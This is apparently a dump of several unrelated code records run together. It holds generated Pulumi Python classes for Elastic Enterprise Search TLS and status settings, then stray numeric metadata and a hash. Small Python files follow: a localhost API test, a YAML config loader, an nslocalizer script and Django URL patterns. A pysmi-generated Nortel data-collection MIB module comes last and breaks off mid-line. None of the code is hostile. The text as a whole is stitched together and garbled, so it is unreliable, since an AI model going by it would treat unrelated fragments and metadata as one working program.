pulumi.Input['EnterpriseSearchSpecHttpTlsCertificateArgs'] certificate: Certificate is a reference to a Kubernetes secret that contains the certificate and private key for enabling TLS. The referenced secret should contain the following: - `ca.crt`: The certificate authority (optional). - `tls.crt`: The certificate (or a chain). - `tls.key`: The private key to the first certificate in the certificate chain. :param pulumi.Input['EnterpriseSearchSpecHttpTlsSelfSignedCertificateArgs'] self_signed_certificate: SelfSignedCertificate allows configuring the self-signed certificate generated by the operator. """ if certificate is not None: pulumi.set(__self__, "certificate", certificate) if self_signed_certificate is not None: pulumi.set(__self__, "self_signed_certificate", self_signed_certificate) @property @pulumi.getter def certificate(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsCertificateArgs']]: """ Certificate is a reference to a Kubernetes secret that contains the certificate and private key for enabling TLS. The referenced secret should contain the following: - `ca.crt`: The certificate authority (optional). - `tls.crt`: The certificate (or a chain). - `tls.key`: The private key to the first certificate in the certificate chain. """ return pulumi.get(self, "certificate") @certificate.setter def certificate(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsCertificateArgs']]): pulumi.set(self, "certificate", value) @property @pulumi.getter(name="selfSignedCertificate") def self_signed_certificate(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsSelfSignedCertificateArgs']]: """ SelfSignedCertificate allows configuring the self-signed certificate generated by the operator. """ return pulumi.get(self, "self_signed_certificate") @self_signed_certificate.setter def self_signed_certificate(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsSelfSignedCertificateArgs']]): pulumi.set(self, "self_signed_certificate", value) @pulumi.input_type class EnterpriseSearchSpecHttpTlsCertificateArgs: def __init__(__self__, *, secret_name: Optional[pulumi.Input[str]] = None): """ Certificate is a reference to a Kubernetes secret that contains the certificate and private key for enabling TLS. The referenced secret should contain the following: - `ca.crt`: The certificate authority (optional). - `tls.crt`: The certificate (or a chain). - `tls.key`: The private key to the first certificate in the certificate chain. :param pulumi.Input[str] secret_name: SecretName is the name of the secret. """ if secret_name is not None: pulumi.set(__self__, "secret_name", secret_name) @property @pulumi.getter(name="secretName") def secret_name(self) -> Optional[pulumi.Input[str]]: """ SecretName is the name of the secret. """ return pulumi.get(self, "secret_name") @secret_name.setter def secret_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "secret_name", value) @pulumi.input_type class EnterpriseSearchSpecHttpTlsSelfSignedCertificateArgs: def __init__(__self__, *, disabled: Optional[pulumi.Input[bool]] = None, subject_alt_names: Optional[pulumi.Input[Sequence[pulumi.Input['EnterpriseSearchSpecHttpTlsSelfSignedCertificateSubjectAltNamesArgs']]]] = None): """ SelfSignedCertificate allows configuring the self-signed certificate generated by the operator. :param pulumi.Input[bool] disabled: Disabled indicates that the provisioning of the self-signed certifcate should be disabled. :param pulumi.Input[Sequence[pulumi.Input['EnterpriseSearchSpecHttpTlsSelfSignedCertificateSubjectAltNamesArgs']]] subject_alt_names: SubjectAlternativeNames is a list of SANs to include in the generated HTTP TLS certificate. """ if disabled is not None: pulumi.set(__self__, "disabled", disabled) if subject_alt_names is not None: pulumi.set(__self__, "subject_alt_names", subject_alt_names) @property @pulumi.getter def disabled(self) -> Optional[pulumi.Input[bool]]: """ Disabled indicates that the provisioning of the self-signed certifcate should be disabled. """ return pulumi.get(self, "disabled") @disabled.setter def disabled(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "disabled", value) @property @pulumi.getter(name="subjectAltNames") def subject_alt_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EnterpriseSearchSpecHttpTlsSelfSignedCertificateSubjectAltNamesArgs']]]]: """ SubjectAlternativeNames is a list of SANs to include in the generated HTTP TLS certificate. """ return pulumi.get(self, "subject_alt_names") @subject_alt_names.setter def subject_alt_names(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EnterpriseSearchSpecHttpTlsSelfSignedCertificateSubjectAltNamesArgs']]]]): pulumi.set(self, "subject_alt_names", value) @pulumi.input_type class EnterpriseSearchSpecHttpTlsSelfSignedCertificateSubjectAltNamesArgs: def __init__(__self__, *, dns: Optional[pulumi.Input[str]] = None, ip: Optional[pulumi.Input[str]] = None): """ SubjectAlternativeName represents a SAN entry in a x509 certificate. :param pulumi.Input[str] dns: DNS is the DNS name of the subject. :param pulumi.Input[str] ip: IP is the IP address of the subject. """ if dns is not None: pulumi.set(__self__, "dns", dns) if ip is not None: pulumi.set(__self__, "ip", ip) @property @pulumi.getter def dns(self) -> Optional[pulumi.Input[str]]: """ DNS is the DNS name of the subject. """ return pulumi.get(self, "dns") @dns.setter def dns(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "dns", value) @property @pulumi.getter def ip(self) -> Optional[pulumi.Input[str]]: """ IP is the IP address of the subject. """ return pulumi.get(self, "ip") @ip.setter def ip(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "ip", value) @pulumi.input_type class EnterpriseSearchStatusArgs: def __init__(__self__, *, association_status: Optional[pulumi.Input[str]] = None, available_nodes: Optional[pulumi.Input[int]] = None, health: Optional[pulumi.Input[str]] = None, service: Optional[pulumi.Input[str]] = None, version: Optional[pulumi.Input[str]] = None): """ EnterpriseSearchStatus defines the observed state of EnterpriseSearch :param pulumi.Input[str] association_status: Association is the status of any auto-linking to Elasticsearch clusters. :param pulumi.Input[int] available_nodes: AvailableNodes is the number of available replicas in the deployment. :param pulumi.Input[str] health: Health of the deployment. :param pulumi.Input[str] service: ExternalService is the name of the service associated to the Enterprise Search Pods. :param pulumi.Input[str] version: Version of the stack resource currently running. During version upgrades, multiple versions may run in parallel: this value specifies the lowest version currently running. """ if association_status is not None: pulumi.set(__self__, "association_status", association_status) if available_nodes is not None: pulumi.set(__self__, "available_nodes", available_nodes) if health is not None: pulumi.set(__self__, "health", health) if service is not None: pulumi.set(__self__, "service", service) if version is not None: pulumi.set(__self__, "version", version) @property @pulumi.getter(name="associationStatus") def association_status(self) -> Optional[pulumi.Input[str]]: """ Association is the status of any auto-linking to Elasticsearch clusters. """ return pulumi.get(self, "association_status") @association_status.setter def association_status(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "association_status", value) @property @pulumi.getter(name="availableNodes") def available_nodes(self) -> Optional[pulumi.Input[int]]: """ AvailableNodes is the number of available replicas in the deployment. """ return pulumi.get(self, "available_nodes") @available_nodes.setter def available_nodes(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "available_nodes", value) @property @pulumi.getter def health(self) -> Optional[pulumi.Input[str]]: """ Health of the deployment. """ return pulumi.get(self, "health") @health.setter def health(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "health", value) @property @pulumi.getter def service(self) -> Optional[pulumi.Input[str]]: """ ExternalService is the name of the service associated to the Enterprise Search Pods. """ return pulumi.get(self, "service") @service.setter def service(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "service", value) @property @pulumi.getter def version(self) -> Optional[pulumi.Input[str]]: """ Version of the stack resource currently running. During version upgrades, multiple versions may run in parallel: this value specifies the lowest version currently running. """ return pulumi.get(self, "version") @version.setter def version(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "version", value)
57.832988
905
0.711413
6,858
55,751
5.67527
0.078157
0.068678
0.071761
0.037306
0.794841
0.705069
0.642198
0.578813
0.553403
0.524113
0
0.001773
0.200642
55,751
963
906
57.893043
0.871581
0.460512
0
0.270833
1
0
0.159318
0.105454
0
0
0
0
0
1
0.203125
false
0.001736
0.008681
0
0.326389
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
f736ed591c705009f410e5f41e8edef29949cfa3
138
py
Python
test/api_test.py
adi4387/titanic
d45a124781ba1cb2b194c179725f856faea8c082
[ "MIT" ]
null
null
null
test/api_test.py
adi4387/titanic
d45a124781ba1cb2b194c179725f856faea8c082
[ "MIT" ]
null
null
null
test/api_test.py
adi4387/titanic
d45a124781ba1cb2b194c179725f856faea8c082
[ "MIT" ]
null
null
null
import json import requests data = json.dumps({'name':'Aditya'}) res = requests.post('http://127.0.0.1:10001/api', data) print(res.text)
19.714286
55
0.695652
23
138
4.173913
0.73913
0
0
0
0
0
0
0
0
0
0
0.088
0.094203
138
6
56
23
0.68
0
0
0
0
0
0.26087
0
0
0
0
0
0
1
0
false
0
0.4
0
0.4
0.2
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
f73a9408751376983aedf679f68c28c3da0028c9
140
py
Python
config.py
bsoyka/sunset-bot
ea05000e52e1883ddba77ab754e5f733c8b3375c
[ "MIT" ]
1
2021-06-21T16:58:48.000Z
2021-06-21T16:58:48.000Z
config.py
bsoyka/sunset-bot
ea05000e52e1883ddba77ab754e5f733c8b3375c
[ "MIT" ]
4
2021-08-13T16:52:51.000Z
2021-09-01T13:05:42.000Z
config.py
sunset-vacation/bot
ea05000e52e1883ddba77ab754e5f733c8b3375c
[ "MIT" ]
4
2021-06-21T22:16:12.000Z
2021-08-11T21:01:19.000Z
from pathlib import Path from dynamic_yaml import load with (Path(__file__).parent / 'config.yaml').open() as f: CONFIG = load(f)
23.333333
58
0.692857
21
140
4.380952
0.666667
0
0
0
0
0
0
0
0
0
0
0
0.192857
140
5
59
28
0.814159
0
0
0
0
0
0.081481
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
f743ef1f6c6a7987bbec9b57f3aab00ae11ba480
112
py
Python
nslocalizer.py
kolyadenko/nslocalizer
70fab1f5bc6f0ebfe7f7e394dc1739ea50cde29a
[ "BSD-3-Clause" ]
172
2016-09-03T22:27:37.000Z
2022-03-09T03:35:49.000Z
nslocalizer.py
kolyadenko/nslocalizer
70fab1f5bc6f0ebfe7f7e394dc1739ea50cde29a
[ "BSD-3-Clause" ]
7
2016-12-19T12:22:50.000Z
2019-05-03T06:38:46.000Z
nslocalizer.py
kolyadenko/nslocalizer
70fab1f5bc6f0ebfe7f7e394dc1739ea50cde29a
[ "BSD-3-Clause" ]
11
2016-09-04T14:04:13.000Z
2021-05-21T12:05:16.000Z
#!/usr/bin/python import nslocalizer def main(): nslocalizer.main() if __name__ == "__main__": main()
12.444444
26
0.651786
13
112
5
0.692308
0
0
0
0
0
0
0
0
0
0
0
0.1875
112
9
27
12.444444
0.714286
0.142857
0
0
0
0
0.083333
0
0
0
0
0
0
1
0.2
true
0
0.2
0
0.4
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
3
f75ba07b5b28c452cc03c74482f21cbdd17a28fb
174
py
Python
catalog/urls.py
Rezakarimpy/SUS
0cbb262a699326a412d46a81a32771bfcf48cc51
[ "Apache-2.0" ]
null
null
null
catalog/urls.py
Rezakarimpy/SUS
0cbb262a699326a412d46a81a32771bfcf48cc51
[ "Apache-2.0" ]
null
null
null
catalog/urls.py
Rezakarimpy/SUS
0cbb262a699326a412d46a81a32771bfcf48cc51
[ "Apache-2.0" ]
null
null
null
from django.urls import path from . import views urlpatterns = [ path('', views.index, name='index'), path('books/', views.BookListView.as_view(), name='books'), ]
24.857143
63
0.66092
22
174
5.181818
0.590909
0
0
0
0
0
0
0
0
0
0
0
0.16092
174
7
64
24.857143
0.780822
0
0
0
0
0
0.091429
0
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
f75de59575b5403a37c2104b2565c99adfed57c6
22,408
py
Python
pysnmp/Nortel-MsCarrier-MscPassport-DataCollectionMIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
11
2021-02-02T16:27:16.000Z
2021-08-31T06:22:49.000Z
pysnmp/Nortel-MsCarrier-MscPassport-DataCollectionMIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
75
2021-02-24T17:30:31.000Z
2021-12-08T00:01:18.000Z
pysnmp/Nortel-MsCarrier-MscPassport-DataCollectionMIB.py
agustinhenze/mibs.snmplabs.com
1fc5c07860542b89212f4c8ab807057d9a9206c7
[ "Apache-2.0" ]
10
2019-04-30T05:51:36.000Z
2022-02-16T03:33:41.000Z
# # PySNMP MIB module Nortel-MsCarrier-MscPassport-DataCollectionMIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Nortel-MsCarrier-MscPassport-DataCollectionMIB # Produced by pysmi-0.3.4 at Mon Apr 29 20:20:12 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ConstraintsUnion, SingleValueConstraint, ValueRangeConstraint, ValueSizeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "SingleValueConstraint", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsIntersection") DisplayString, Integer32, RowStatus, Gauge32, Counter32, Unsigned32, StorageType = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-StandardTextualConventionsMIB", "DisplayString", "Integer32", "RowStatus", "Gauge32", "Counter32", "Unsigned32", "StorageType") AsciiString, EnterpriseDateAndTime, NonReplicated = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-TextualConventionsMIB", "AsciiString", "EnterpriseDateAndTime", "NonReplicated") mscPassportMIBs, mscComponents = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-UsefulDefinitionsMIB", "mscPassportMIBs", "mscComponents") NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance") Integer32, Counter64, MibIdentifier, NotificationType, ObjectIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, ModuleIdentity, IpAddress, iso, Gauge32, Counter32, Bits, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "Counter64", "MibIdentifier", "NotificationType", "ObjectIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "ModuleIdentity", "IpAddress", "iso", "Gauge32", "Counter32", "Bits", "Unsigned32") DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention") dataCollectionMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 14)) mscCol = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21)) mscColRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1), ) if mibBuilder.loadTexts: mscColRowStatusTable.setStatus('mandatory') mscColRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex")) if mibBuilder.loadTexts: mscColRowStatusEntry.setStatus('mandatory') mscColRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1, 1), RowStatus()).setMaxAccess("readwrite") if mibBuilder.loadTexts: mscColRowStatus.setStatus('mandatory') mscColComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1, 2), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColComponentName.setStatus('mandatory') mscColStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1, 4), StorageType()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColStorageType.setStatus('mandatory') mscColIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 1, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("accounting", 0), ("alarm", 1), ("log", 2), ("debug", 3), ("scn", 4), ("trap", 5), ("stats", 6)))) if mibBuilder.loadTexts: mscColIndex.setStatus('mandatory') mscColProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 10), ) if mibBuilder.loadTexts: mscColProvTable.setStatus('mandatory') mscColProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 10, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex")) if mibBuilder.loadTexts: mscColProvEntry.setStatus('mandatory') mscColAgentQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 10, 1, 1), Unsigned32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(20, 10000), ))).setMaxAccess("readwrite") if mibBuilder.loadTexts: mscColAgentQueueSize.setStatus('obsolete') mscColStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11), ) if mibBuilder.loadTexts: mscColStatsTable.setStatus('mandatory') mscColStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex")) if mibBuilder.loadTexts: mscColStatsEntry.setStatus('mandatory') mscColCurrentQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColCurrentQueueSize.setStatus('mandatory') mscColRecordsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11, 1, 2), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColRecordsRx.setStatus('mandatory') mscColRecordsDiscarded = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 11, 1, 3), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColRecordsDiscarded.setStatus('mandatory') mscColTimesTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 266), ) if mibBuilder.loadTexts: mscColTimesTable.setStatus('mandatory') mscColTimesEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 266, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColTimesValue")) if mibBuilder.loadTexts: mscColTimesEntry.setStatus('mandatory') mscColTimesValue = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 266, 1, 1), EnterpriseDateAndTime().subtype(subtypeSpec=ValueSizeConstraint(5, 5)).setFixedLength(5)).setMaxAccess("readwrite") if mibBuilder.loadTexts: mscColTimesValue.setStatus('mandatory') mscColTimesRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 266, 1, 2), RowStatus()).setMaxAccess("writeonly") if mibBuilder.loadTexts: mscColTimesRowStatus.setStatus('mandatory') mscColLastTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 275), ) if mibBuilder.loadTexts: mscColLastTable.setStatus('obsolete') mscColLastEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 275, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColLastValue")) if mibBuilder.loadTexts: mscColLastEntry.setStatus('obsolete') mscColLastValue = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 275, 1, 1), EnterpriseDateAndTime().subtype(subtypeSpec=ValueSizeConstraint(19, 19)).setFixedLength(19)).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColLastValue.setStatus('obsolete') mscColPeakTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 279), ) if mibBuilder.loadTexts: mscColPeakTable.setStatus('mandatory') mscColPeakEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 279, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColPeakValue")) if mibBuilder.loadTexts: mscColPeakEntry.setStatus('mandatory') mscColPeakValue = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 279, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 15))).setMaxAccess("readwrite") if mibBuilder.loadTexts: mscColPeakValue.setStatus('mandatory') mscColPeakRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 279, 1, 2), RowStatus()).setMaxAccess("writeonly") if mibBuilder.loadTexts: mscColPeakRowStatus.setStatus('mandatory') mscColSp = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2)) mscColSpRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1), ) if mibBuilder.loadTexts: mscColSpRowStatusTable.setStatus('mandatory') mscColSpRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex")) if mibBuilder.loadTexts: mscColSpRowStatusEntry.setStatus('mandatory') mscColSpRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1, 1), RowStatus()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpRowStatus.setStatus('mandatory') mscColSpComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1, 2), DisplayString()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpComponentName.setStatus('mandatory') mscColSpStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1, 4), StorageType()).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpStorageType.setStatus('mandatory') mscColSpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 1, 1, 10), NonReplicated()) if mibBuilder.loadTexts: mscColSpIndex.setStatus('mandatory') mscColSpProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 10), ) if mibBuilder.loadTexts: mscColSpProvTable.setStatus('mandatory') mscColSpProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 10, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex")) if mibBuilder.loadTexts: mscColSpProvEntry.setStatus('mandatory') mscColSpSpooling = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 10, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("off", 0), ("on", 1)))).setMaxAccess("readwrite") if mibBuilder.loadTexts: mscColSpSpooling.setStatus('mandatory') mscColSpMaximumNumberOfFiles = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 10, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 200))).setMaxAccess("readwrite") if mibBuilder.loadTexts: mscColSpMaximumNumberOfFiles.setStatus('mandatory') mscColSpStateTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11), ) if mibBuilder.loadTexts: mscColSpStateTable.setStatus('mandatory') mscColSpStateEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex")) if mibBuilder.loadTexts: mscColSpStateEntry.setStatus('mandatory') mscColSpAdminState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2))).clone(namedValues=NamedValues(("locked", 0), ("unlocked", 1), ("shuttingDown", 2))).clone('unlocked')).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpAdminState.setStatus('mandatory') mscColSpOperationalState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("disabled", 0), ("enabled", 1))).clone('disabled')).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpOperationalState.setStatus('mandatory') mscColSpUsageState = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2))).clone(namedValues=NamedValues(("idle", 0), ("active", 1), ("busy", 2))).clone('idle')).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpUsageState.setStatus('mandatory') mscColSpAvailabilityStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(2, 2)).setFixedLength(2)).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpAvailabilityStatus.setStatus('mandatory') mscColSpProceduralStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpProceduralStatus.setStatus('mandatory') mscColSpControlStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 6), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpControlStatus.setStatus('mandatory') mscColSpAlarmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpAlarmStatus.setStatus('mandatory') mscColSpStandbyStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 15))).clone(namedValues=NamedValues(("hotStandby", 0), ("coldStandby", 1), ("providingService", 2), ("notSet", 15))).clone('notSet')).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpStandbyStatus.setStatus('mandatory') mscColSpUnknownStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 11, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("false", 0), ("true", 1))).clone('false')).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpUnknownStatus.setStatus('mandatory') mscColSpOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 12), ) if mibBuilder.loadTexts: mscColSpOperTable.setStatus('mandatory') mscColSpOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 12, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex")) if mibBuilder.loadTexts: mscColSpOperEntry.setStatus('mandatory') mscColSpSpoolingFileName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 12, 1, 1), AsciiString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly") if mibBuilder.loadTexts: mscColSpSpoolingFileName.setStatus('mandatory') mscColSpStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13), ) if mibBuilder.loadTexts: mscColSpStatsTable.setStatus('mandatory') mscColSpStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColIndex"), (0, "Nortel-MsCarrier-MscPassport-DataCollectionMIB", "mscColSpIndex")) if mibBuilder.loadTexts: mscColSpStatsEntry.setStatus('mandatory') mscColSpCurrentQueueSize = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 21, 2, 13, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 